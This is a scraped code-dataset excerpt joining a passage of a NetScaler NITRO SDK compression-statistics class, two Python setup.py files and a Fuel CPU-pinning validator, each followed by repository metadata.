def delcomperrbypassedrate(self) :
"""Rate (/s) counter for delcomperrbypassed.
"""
try :
return self._delcomperrbypassedrate
except Exception as e:
raise e
@property
def delcmpratio(self) :
"""Ratio of compressible data received to compressed data transmitted.If this ratio is one (uncmp:1.0) that means compression is disabled or we are not able to compress even a single compressible packet.
"""
try :
return self._delcmpratio
except Exception as e:
raise e
@property
def delcomprequestsrate(self) :
"""Rate (/s) counter for delcomptotalrequests.
"""
try :
return self._delcomprequestsrate
except Exception as e:
raise e
@property
def delcomperrreqinfotoobig(self) :
"""Number of times basefile request URL was too large.
"""
try :
return self._delcomperrreqinfotoobig
except Exception as e:
raise e
@property
def delcomptcprxpacketsrate(self) :
"""Rate (/s) counter for delcomptcprxpackets.
"""
try :
return self._delcomptcprxpacketsrate
except Exception as e:
raise e
@property
def decomptcperrmemory(self) :
"""Number of times memory failures occurred while decompressing.
"""
try :
return self._decomptcperrmemory
except Exception as e:
raise e
@property
def decomptcprxbytes(self) :
"""Total number of compressed bytes received by NetScaler.
"""
try :
return self._decomptcprxbytes
except Exception as e:
raise e
@property
def comptcptxpacketsrate(self) :
"""Rate (/s) counter for comptcptotaltxpackets.
"""
try :
return self._comptcptxpacketsrate
except Exception as e:
raise e
@property
def comptotaldatacompressionratio(self) :
"""Ratio of total HTTP data received to total HTTP data transmitted.
"""
try :
return self._comptotaldatacompressionratio
except Exception as e:
raise e
@property
def comprxbytesrate(self) :
"""Rate (/s) counter for comptotalrxbytes.
"""
try :
return self._comprxbytesrate
except Exception as e:
raise e
@property
def delcomperrsessallocfailrate(self) :
"""Rate (/s) counter for delcomperrsessallocfail.
"""
try :
return self._delcomperrsessallocfailrate
except Exception as e:
raise e
@property
def delcomptcptxpacketsrate(self) :
"""Rate (/s) counter for delcomptcptxpackets.
"""
try :
return self._delcomptcptxpacketsrate
except Exception as e:
raise e
@property
def comptcptotaleoi(self) :
"""Number of times the NetScaler compresses data on receiving End Of Input (FIN packet). When the NetScaler receives End Of Input (FIN packet), it compresses the buffered data immediately without waiting for the buffered data size to reach the quantum size.
"""
try :
return self._comptcptotaleoi
except Exception as e:
raise e
@property
def comptcppushrate(self) :
"""Rate (/s) counter for comptcptotalpush.
"""
try :
return self._comptcppushrate
except Exception as e:
raise e
@property
def decomptcperrmemoryrate(self) :
"""Rate (/s) counter for decomptcperrmemory.
"""
try :
return self._decomptcperrmemoryrate
except Exception as e:
raise e
@property
def decomptcperrunknownrate(self) :
"""Rate (/s) counter for decomptcperrunknown.
"""
try :
return self._decomptcperrunknownrate
except Exception as e:
raise e
@property
def comptcpbandwidthsaving(self) :
"""Bandwidth saving from TCP compression expressed as percentage.
"""
try :
return self._comptcpbandwidthsaving
except Exception as e:
raise e
@property
def decomptcperrmoredata(self) :
"""Number of times NetScaler received more data than declared by protocol.
"""
try :
return self._decomptcperrmoredata
except Exception as e:
raise e
@property
def delcompfirstaccessrate(self) :
"""Rate (/s) counter for delcompfirstaccess.
"""
try :
return self._delcompfirstaccessrate
except Exception as e:
raise e
@property
def comprxpacketsrate(self) :
"""Rate (/s) counter for comptotalrxpackets.
"""
try :
return self._comprxpacketsrate
except Exception as e:
raise e
@property
def comptotalrxbytes(self) :
"""Number of bytes that can be compressed, which the NetScaler receives from the server. This gives the content length of the response that the NetScaler receives from server.
"""
try :
return self._comptotalrxbytes
except Exception as e:
raise e
@property
def decomptcprxpacketsrate(self) :
"""Rate (/s) counter for decomptcprxpackets.
"""
try :
return self._decomptcprxpacketsrate
except Exception as e:
raise e
@property
def comptcpquantumrate(self) :
"""Rate (/s) counter for comptcptotalquantum.
"""
try :
return self._comptcpquantumrate
except Exception as e:
raise e
@property
def comptxbytesrate(self) :
"""Rate (/s) counter for comptotaltxbytes.
"""
try :
return self._comptxbytesrate
except Exception as e:
raise e
@property
def delcompbaseservedrate(self) :
"""Rate (/s) counter for delcompbaseserved.
"""
try :
return self._delcompbaseservedrate
except Exception as e:
raise e
@property
def decomptcptxbytes(self) :
"""Total number of decompressed bytes transmitted by NetScaler.
"""
try :
return self._decomptcptxbytes
except Exception as e:
raise e
@property
def comptcptxbytesrate(self) :
"""Rate (/s) counter for comptcptotaltxbytes.
"""
try :
return self._comptcptxbytesrate
except Exception as e:
raise e
@property
def delcomptcprxpackets(self) :
"""Number of delta-compressible packets received.
"""
try :
return self._delcomptcprxpackets
except Exception as e:
raise e
@property
def decomptcprxpackets(self) :
"""Total number of compressed packets received by NetScaler.
"""
try :
return self._decomptcprxpackets
except Exception as e:
raise e
@property
def comptcptotaltimer(self) :
"""Number of times the NetScaler compresses data on expiration of data accumulation timer. The timer expires if the server response is very slow and consequently, the NetScaler does not receive response for a certain amount of time. Under such a condition, the NetScaler compresses the buffered data immediately without waiting for the buffered data size to reach the quantum size.
"""
try :
return self._comptcptotaltimer
except Exception as e:
raise e
@property
def delcomperrnostoremissrate(self) :
"""Rate (/s) counter for delcomperrnostoremiss.
"""
try :
return self._delcomperrnostoremissrate
except Exception as e:
raise e
@property
def delcomperrbfilewhdrfailed(self) :
"""Number of times basefile could not be updated in NetScaler cache.
"""
try :
return self._delcomperrbfilewhdrfailed
except Exception as e:
raise e
@property
def decomptcperrmoredatarate(self) :
"""Rate (/s) counter for decomptcperrmoredata.
"""
try :
return self._decomptcperrmoredatarate
except Exception as e:
raise e
@property
def decomptcpbandwidthsaving(self) :
"""Bandwidth saving from TCP compression expressed as percentage.
"""
try :
return self._decomptcpbandwidthsaving
except Exception as e:
raise e
@property
def delcomperrsessallocfail(self) :
"""Number of times delta compression session could not be allocated.
"""
try :
return self._delcomperrsessallocfail
except Exception as e:
raise e
@property
def delcompbaseserved(self) :
"""Total number of basefile requests served by NetScaler.
"""
try :
return self._delcompbaseserved
except Exception as e:
raise e
@property
def compratio(self) :
"""Ratio of the compressible data received from the server to the compressed data sent to the client.
"""
try :
return self._compratio
except Exception as e:
raise e
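	# For instance (hypothetical numbers): 100 MB of compressible data received
	# from the server and 25 MB of compressed data sent to the client gives a
	# compratio of 4.0, i.e. a 4:1 compression ratio.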
@property
def decomptcptxbytesrate(self) :
"""Rate (/s) counter for decomptcptxbytes.
"""
try :
return self._decomptcptxbytesrate
except Exception as e:
raise e
@property
def decomptcperrlessdata(self) :
"""Number of times NetScaler received less data than declared by protocol.
"""
try :
return self._decomptcperrlessdata
except Exception as e:
raise e
@property
def comptcprxbytesrate(self) :
"""Rate (/s) counter for comptcptotalrxbytes.
"""
try :
return self._comptcprxbytesrate
except Exception as e:
raise e
@property
def comptxpacketsrate(self) :
"""Rate (/s) counter for comptotaltxpackets.
"""
try :
return self._comptxpacketsrate
except Exception as e:
raise e
@property
def comptcprxpacketsrate(self) :
"""Rate (/s) counter for comptcptotalrxpackets.
"""
try :
return self._comptcprxpacketsrate
except Exception as e:
raise e
@property
def comptotaltxpackets(self) :
"""Number of HTTP packets that the NetScaler sends to the client after compressing the response from the server.
"""
try :
return self._comptotaltxpackets
except Exception as e:
raise e
@property
def delcomptcptxbytesrate(self) :
"""Rate (/s) counter for delcomptcptxbytes.
"""
try :
return self._delcomptcptxbytesrate
except Exception as e:
raise e
@property
def delcomperrreqinfotoobigrate(self) :
"""Rate (/s) counter for delcomperrreqinfotoobig.
"""
try :
return self._delcomperrreqinfotoobigrate
except Exception as e:
raise e
@property
def decomptcprxbytesrate(self) :
"""Rate (/s) counter for decomptcprxbytes.
"""
try :
return self._decomptcprxbytesrate
except Exception as e:
raise e
@property
def decomptcperrdatarate(self) :
"""Rate (/s) counter for decomptcperrdata.
"""
try :
return self._decomptcperrdatarate
except Exception as e:
raise e
@property
def comptotalrequests(self) :
"""Number of HTTP compression requests the NetScaler receives for which the response is successfully compressed. For example, after you enable compression and configure services, if you send requests to the NetScaler with the following header information: "Accept-Encoding: gzip, deflate", and NetScaler compresses the corresponding response, this counter is incremented.
"""
try :
return self._comptotalrequests
except Exception as e:
raise e
@property
def decomptcperrunknown(self) :
"""Number of times unknown errors occurred while decompressing.
"""
try :
return self._decomptcperrunknown
except Exception as e:
raise e
@property
def comptotalrxpackets(self) :
"""Number of HTTP packets that can be compressed, which the NetScaler receives from the server.
"""
try :
return self._comptotalrxpackets
except Exception as e:
raise e
@property
def delcomptcprxbytes(self) :
"""Total number of delta-compressible bytes received by NetScaler.
"""
try :
return self._delcomptcprxbytes
except Exception as e:
raise e
@property
def comptcptimerrate(self) :
"""Rate (/s) counter for comptcptotaltimer.
"""
try :
return self._comptcptimerrate
except Exception as e:
raise e
@property
def comptcptotalquantum(self) :
"""Number of times the NetScaler compresses a quantum of data. NetScaler buffers the data received from the server till it reaches the quantum size and then compresses the buffered data and transmits to the client.
"""
try :
return self._comptcptotalquantum
except Exception as e:
raise e
@property
def comptcptotaltxpackets(self) :
"""Number of TCP packets that the NetScaler sends to the client after compressing the response from the server.
"""
try :
return self._comptcptotaltxpackets
except Exception as e:
raise e
@property
def delcompdonerate(self) :
"""Rate (/s) counter for delcompdone.
"""
try :
return self._delcompdonerate
except Exception as e:
raise e
@property
def delcomptcptxpackets(self) :
"""Total number of delta-compressed packets transmitted by NetScaler.
"""
try :
return self._delcomptcptxpackets
except Exception as e:
raise e
@property
def decomptcpratio(self) :
"""Ratio of decompressed data transmitted to compressed data received.
"""
try :
return self._decomptcpratio
except Exception as e:
raise e
@property
def decomptcperrlessdatarate(self) :
"""Rate (/s) counter for decomptcperrlessdata.
"""
try :
return self._decomptcperrlessdatarate
except Exception as e:
raise e
@property
def comptcptotalrxbytes(self) :
"""Number of bytes that can be compressed, which the NetScaler receives from the server. This gives the content length of the response that the NetScaler receives from server.
"""
try :
return self._comptcptotalrxbytes
except Exception as e:
raise e
@property
def delcomptcprxbytesrate(self) :
"""Rate (/s) counter for delcomptcprxbytes.
"""
try :
return self._delcomptcprxbytesrate
except Exception as e:
raise e
@property
def comptcptotaltxbytes(self) :
"""Number of bytes that the NetScaler sends to the client after compressing the response from the server.
"""
try :
return self._comptcptotaltxbytes
except Exception as e:
raise e
@property
def decomptcptxpackets(self) :
"""Total number of decompressed packets transmitted by NetScaler.
"""
try :
return self._decomptcptxpackets
except Exception as e:
raise e
@property
def delcomptotalrequests(self) :
"""Total number of delta compression requests received by NetScaler.
"""
try :
return self._delcomptotalrequests
except Exception as e:
raise e
@property
def delcomperrreqinfoallocfailrate(self) :
"""Rate (/s) counter for delcomperrreqinfoallocfail.
"""
try :
return self._delcomperrreqinfoallocfailrate
except Exception as e:
raise e
@property
def delcomperrbfilewhdrfailedrate(self) :
"""Rate (/s) counter for delcomperrbfilewhdrfailed.
"""
try :
return self._delcomperrbfilewhdrfailedrate
except Exception as e:
raise e
@property
def delcomperrnostoremiss(self) :
"""Number of times basefile was not found in NetScaler cache.
"""
try :
return self._delcomperrnostoremiss
except Exception as e:
raise e
@property
def comptcpratio(self) :
"""Ratio of compressible data received to compressed data transmitted.If this ratio is one (uncmp:1.0) that means compression is disabled or we are not able to compress even a single compressible packet.
"""
try :
return self._comptcpratio
except Exception as e:
raise e
@property
def decomptcperrdata(self) :
"""Number of data errors encountered while decompressing.
"""
try :
return self._decomptcperrdata
except Exception as e:
raise e
def _get_nitro_response(self, service, response) :
""" converts nitro response into object and returns the object array in case of get request.
"""
try :
result = service.payload_formatter.string_to_resource(cmp_response, response, self.__class__.__name__.replace('_stats',''))
if(result.errorcode != 0) :
if (result.errorcode == 444) :
service.clear_session(self)
if result.severity :
if (result.severity == "ERROR") :
raise nitro_exception(result.errorcode, str(result.message), str(result.severity))
else :
raise nitro_exception(result.errorcode, str(result.message), str(result.severity))
return result.cmp
except Exception as e :
raise e
def _get_object_name(self) :
""" Returns the value of object identifier argument
"""
try :
return None
except Exception as e :
raise e
@classmethod
def get(cls, service, name="", option_="") :
""" Use this API to fetch the statistics of all cmp_stats resources that are configured on netscaler.
"""
try :
obj = cmp_stats()
if not name :
response = obj.stat_resources(service, option_)
return response
except Exception as e:
raise e
class Clearstats:
basic = "basic"
full = "full"
class cmp_response(base_response) :
def __init__(self, length=1) :
self.cmp = []
self.errorcode = 0
self.message = ""
self.severity = ""
self.sessionid = ""
self.cmp = [cmp_stats() for _ in range(length)]
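# Illustrative usage sketch (not part of the generated SDK file): the
# nitro_service import path and login signature are assumed from the
# surrounding SDK layout; the host and credentials are placeholders.
#
#   from nssrc.com.citrix.netscaler.nitro.service.nitro_service import nitro_service
#
#   client = nitro_service("192.0.2.10", "http")
#   client.login("nsroot", "nsroot")
#   stats = cmp_stats.get(client)
#   print(stats[0].compratio, stats[0].comptotalrequests)
#   client.logout()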
| apache-2.0 | 1,323,930,941,714,670,600 | 24.039914 | 384 | 0.721006 | false |
InfectedPacket/resyst | setup.py | 1 | 8840 | # -*- coding: utf-8 -*-
from __future__ import print_function
import os
import sys
import imp
import subprocess
## Python 2.6 subprocess.check_output compatibility. Thanks Greg Hewgill!
if 'check_output' not in dir(subprocess):
def check_output(cmd_args, *args, **kwargs):
proc = subprocess.Popen(
cmd_args, *args,
stdout=subprocess.PIPE, stderr=subprocess.PIPE, **kwargs)
out, err = proc.communicate()
if proc.returncode != 0:
            raise subprocess.CalledProcessError(proc.returncode, cmd_args)
return out
subprocess.check_output = check_output
from setuptools import setup, find_packages
from setuptools.command.test import test as TestCommand
from distutils import spawn
try:
import colorama
colorama.init() # Initialize colorama on Windows
except ImportError:
# Don't require colorama just for running paver tasks. This allows us to
# run `paver install' without requiring the user to first have colorama
# installed.
pass
# Add the current directory to the module search path.
sys.path.insert(0, os.path.abspath('.'))
## Constants
CODE_DIRECTORY = 'resyst'
DOCS_DIRECTORY = 'docs'
TESTS_DIRECTORY = 'tests'
PYTEST_FLAGS = ['--doctest-modules']
# Import metadata. Normally this would just be:
#
# from resyst import metadata
#
# However, when we do this, we also import `resyst/__init__.py'. If this
# imports names from some other modules and these modules have third-party
# dependencies that need installing (which happens after this file is run), the
# script will crash. What we do instead is to load the metadata module by path
# instead, effectively side-stepping the dependency problem. Please make sure
# metadata has no dependencies, otherwise they will need to be added to
# the setup_requires keyword.
metadata = imp.load_source(
'metadata', os.path.join(CODE_DIRECTORY, 'metadata.py'))
## Miscellaneous helper functions
def get_project_files():
"""Retrieve a list of project files, ignoring hidden files.
:return: sorted list of project files
:rtype: :class:`list`
"""
if is_git_project() and has_git():
return get_git_project_files()
project_files = []
for top, subdirs, files in os.walk('.'):
        # Prune hidden directories in place so os.walk skips them; removing
        # items from a list while iterating over it would skip entries.
        subdirs[:] = [subdir for subdir in subdirs if not subdir.startswith('.')]
for f in files:
if f.startswith('.'):
continue
project_files.append(os.path.join(top, f))
return project_files
def is_git_project():
return os.path.isdir('.git')
def has_git():
return bool(spawn.find_executable("git"))
def get_git_project_files():
"""Retrieve a list of all non-ignored files, including untracked files,
excluding deleted files.
:return: sorted list of git project files
:rtype: :class:`list`
"""
cached_and_untracked_files = git_ls_files(
'--cached', # All files cached in the index
'--others', # Untracked files
# Exclude untracked files that would be excluded by .gitignore, etc.
'--exclude-standard')
uncommitted_deleted_files = git_ls_files('--deleted')
# Since sorting of files in a set is arbitrary, return a sorted list to
# provide a well-defined order to tools like flake8, etc.
return sorted(cached_and_untracked_files - uncommitted_deleted_files)
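# Worked example (hypothetical repository state): if git reports cached and
# untracked files {b'a.py', b'b.py', b'c.txt'} and an uncommitted deletion of
# b'b.py', then get_git_project_files() returns [b'a.py', b'c.txt'].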
def git_ls_files(*cmd_args):
"""Run ``git ls-files`` in the top-level project directory. Arguments go
directly to execution call.
:return: set of file names
:rtype: :class:`set`
"""
cmd = ['git', 'ls-files']
cmd.extend(cmd_args)
return set(subprocess.check_output(cmd).splitlines())
def print_success_message(message):
"""Print a message indicating success in green color to STDOUT.
:param message: the message to print
:type message: :class:`str`
"""
try:
import colorama
print(colorama.Fore.GREEN + message + colorama.Fore.RESET)
except ImportError:
print(message)
def print_failure_message(message):
"""Print a message indicating failure in red color to STDERR.
:param message: the message to print
:type message: :class:`str`
"""
try:
import colorama
print(colorama.Fore.RED + message + colorama.Fore.RESET,
file=sys.stderr)
except ImportError:
print(message, file=sys.stderr)
def read(filename):
"""Return the contents of a file.
:param filename: file path
:type filename: :class:`str`
:return: the file's content
:rtype: :class:`str`
"""
with open(os.path.join(os.path.dirname(__file__), filename)) as f:
return f.read()
def _lint():
"""Run lint and return an exit code."""
# Flake8 doesn't have an easy way to run checks using a Python function, so
# just fork off another process to do it.
# Python 3 compat:
# - The result of subprocess call outputs are byte strings, meaning we need
# to pass a byte string to endswith.
project_python_files = [filename for filename in get_project_files()
if filename.endswith(b'.py')]
retcode = subprocess.call(
['flake8', '--max-complexity=10'] + project_python_files)
if retcode == 0:
print_success_message('No style errors')
return retcode
def _test():
"""Run the unit tests.
:return: exit code
"""
# Make sure to import pytest in this function. For the reason, see here:
# <http://pytest.org/latest/goodpractises.html#integration-with-setuptools-test-commands> # NOPEP8
import pytest
# This runs the unit tests.
# It also runs doctest, but only on the modules in TESTS_DIRECTORY.
return pytest.main(PYTEST_FLAGS + [TESTS_DIRECTORY])
def _test_all():
"""Run lint and tests.
:return: exit code
"""
return _lint() + _test()
# The following code is to allow tests to be run with `python setup.py test'.
# The main reason to make this possible is to allow tests to be run as part of
# Setuptools' automatic run of 2to3 on the source code. The recommended way to
# run tests is still `paver test_all'.
# See <http://pythonhosted.org/setuptools/python3.html>
# Code based on <http://pytest.org/latest/goodpractises.html#integration-with-setuptools-test-commands> # NOPEP8
class TestAllCommand(TestCommand):
def finalize_options(self):
TestCommand.finalize_options(self)
# These are fake, and just set to appease distutils and setuptools.
self.test_suite = True
self.test_args = []
def run_tests(self):
raise SystemExit(_test_all())
# define install_requires for specific Python versions
python_version_specific_requires = []
# as of Python >= 2.7 and >= 3.2, the argparse module is maintained within
# the Python standard library, otherwise we install it as a separate package
if sys.version_info < (2, 7) or (3, 0) <= sys.version_info < (3, 3):
python_version_specific_requires.append('argparse')
# See here for more options:
# <http://pythonhosted.org/setuptools/setuptools.html>
setup_dict = dict(
name=metadata.package,
version=metadata.version,
author=metadata.authors[0],
author_email=metadata.emails[0],
maintainer=metadata.authors[0],
maintainer_email=metadata.emails[0],
url=metadata.url,
description=metadata.description,
long_description=read('README.rst'),
# Find a list of classifiers here:
# <http://pypi.python.org/pypi?%3Aaction=list_classifiers>
classifiers=[
'Development Status :: 1 - Planning',
'Environment :: Console',
'Intended Audience :: Developers',
'License :: OSI Approved :: MIT License',
'Natural Language :: English',
'Operating System :: OS Independent',
'Programming Language :: Python :: 3.4',
'Programming Language :: Python :: Implementation :: PyPy',
'Topic :: Documentation',
'Topic :: Software Development :: Libraries :: Python Modules',
'Topic :: System :: Installation/Setup',
'Topic :: System :: Software Distribution',
],
packages=find_packages(exclude=(TESTS_DIRECTORY,)),
install_requires=[
# your module dependencies
] + python_version_specific_requires,
# Allow tests to be run with `python setup.py test'.
tests_require=[
'pytest==2.5.1',
'mock==1.0.1',
'flake8==2.1.0',
],
cmdclass={'test': TestAllCommand},
zip_safe=False, # don't use eggs
entry_points={
'console_scripts': [
'resyst_cli = resyst.main:entry_point'
],
# if you have a gui, use this
# 'gui_scripts': [
# 'resyst_gui = resyst.gui:entry_point'
# ]
}
)
def main():
setup(**setup_dict)
if __name__ == '__main__':
main()
| gpl-2.0 | -3,563,016,569,662,075,000 | 30.347518 | 113 | 0.654638 | false |
pbasov/fuel-extension-cpu-pinning | fuel_extension_cpu_pinning/validators.py | 1 | 1623 | from fuel_extension_cpu_pinning.models import CpuPinOverride
from nailgun.api.v1.validators.base import BasicValidator
from nailgun.errors import errors
from nailgun.logger import logger
class CpuPinningValidator(BasicValidator):
schema = {
"$schema": "http://json-schema.org/draft-04/schema#",
"title": "CPU pinning for Nova and Contrail vrouter",
"description": "CPU cores masks",
"type": "object",
"properties": {
"nova_cores": {"type": "array"},
"vrouter_cores": {"type": "array"},
},
}
@classmethod
def validate(cls, data, node=None, pins_data=None):
"""Check input data for intersections
to ensure correct core bindings
"""
dict_data = cls.validate_json(data)
cls.validate_schema(dict_data, cls.schema)
api_nova_cores = dict_data.get('nova_cores', [])
api_vrouter_cores = dict_data.get('vrouter_cores', [])
db_nova_cores = pins_data.get('nova_cores') or []
db_vrouter_cores = pins_data.get('vrouter_cores') or []
if set(api_nova_cores) & set(api_vrouter_cores) != set():
raise errors.InvalidData('Input values conflict with each other')
if all(cores != [] for cores in (api_nova_cores, api_vrouter_cores)):
return dict_data
if any(condition != set() for condition in [
set(api_nova_cores) & set(db_vrouter_cores),
set(api_vrouter_cores) & set(db_nova_cores)]
):
raise errors.InvalidData('Input values conflict with existing one')
return dict_data
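# Illustrative sketch (not part of the original module): expected behaviour of
# the validator; the JSON payloads and the empty pins_data are hypothetical.
#
#   import json
#
#   overlapping = json.dumps({'nova_cores': [0, 1], 'vrouter_cores': [1, 2]})
#   CpuPinningValidator.validate(overlapping, pins_data={})
#   # -> raises errors.InvalidData (core 1 appears in both lists)
#
#   disjoint = json.dumps({'nova_cores': [0, 1], 'vrouter_cores': [2, 3]})
#   CpuPinningValidator.validate(disjoint, pins_data={})
#   # -> returns the parsed dict, since both lists are non-empty and disjoint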
| apache-2.0 | 5,613,233,836,513,574,000 | 36.744186 | 79 | 0.610598 | false |
akvo/butler | setup.py | 1 | 2525 | # -*- coding: UTF-8 -*-
from distutils.command.install import INSTALL_SCHEMES
from distutils.core import setup
from setuptools import find_packages
import os
import re
import time
_version = "0.1.%sdev0" % int(time.time())
_packages = find_packages('butler', exclude=["*.tests", "*.tests.*", "tests.*", "tests"])
# make sure that data files go into the right place
# see http://groups.google.com/group/comp.lang.python/browse_thread/thread/35ec7b2fed36eaec/2105ee4d9e8042cb
for scheme in INSTALL_SCHEMES.values():
scheme['data'] = scheme['purelib']
# find any static content such as HTML files or CSS
_INCLUDE = re.compile(r"^.*\.(html|less|css|js|png|gif|jpg|mo|eot|svg|ttf|woff|otf|json|conf|txt|ico)$")
_root_directory='butler'
def get_package_data():
package_data = {}
for pkg in os.listdir(_root_directory):
pkg_path = os.path.join(_root_directory, pkg)
if os.path.isdir(pkg_path):
package_data[pkg] = create_paths(pkg_path)
return package_data
def create_paths(root_dir):
paths = []
is_package = os.path.exists(os.path.join(root_dir, '__init__.py'))
children = os.listdir(root_dir)
for child in children:
childpath = os.path.join(root_dir, child)
if os.path.isfile(childpath) and not is_package and _INCLUDE.match(child):
paths.append(child)
if os.path.isdir(childpath):
            paths += [os.path.join(child, path) for path in create_paths(childpath)]
return paths
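# Worked example (hypothetical layout): for a package butler/web containing
# __init__.py and static/css/site.css, create_paths('butler/web') returns
# ['static/css/site.css'], so get_package_data() yields
# {'web': ['static/css/site.css']} -- all paths relative to the package dir.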
_reqs_dir = os.path.join(os.path.dirname(__file__), 'requirements')
def _strip_comments(line):
return line.split('#', 1)[0].strip()
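# For example (hypothetical requirement line):
#   _strip_comments('Django>=1.6  # web framework') -> 'Django>=1.6'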
def _get_reqs(req):
    with open(os.path.join(_reqs_dir, req)) as f:
        requires = f.readlines()
        requires = [_strip_comments(line) for line in requires]
        # List comprehensions (rather than map/filter) keep this working on
        # Python 3 as well, where map() and filter() return lazy iterators.
        return [line for line in requires if line != '']
_install_requires = _get_reqs('common.txt')
_extras_require = {
'psql': _get_reqs('psql.txt'),
'mysql': _get_reqs('mysql.txt'),
}
_data_files = [('', ['requirements/%s' % reqs_file for reqs_file in os.listdir(_reqs_dir)])]
setup(
name='butler',
version=_version,
packages=_packages,
package_dir={'': 'butler'},
package_data=get_package_data(),
install_requires=_install_requires,
extras_require=_extras_require,
data_files=_data_files,
author='Akvo.org',
author_email='[email protected]',
url='https://github.com/akvo/akvo-butler',
license='Affero GPL',
)
| agpl-3.0 | -8,536,758,986,645,435,000 | 27.693182 | 109 | 0.643564 | false |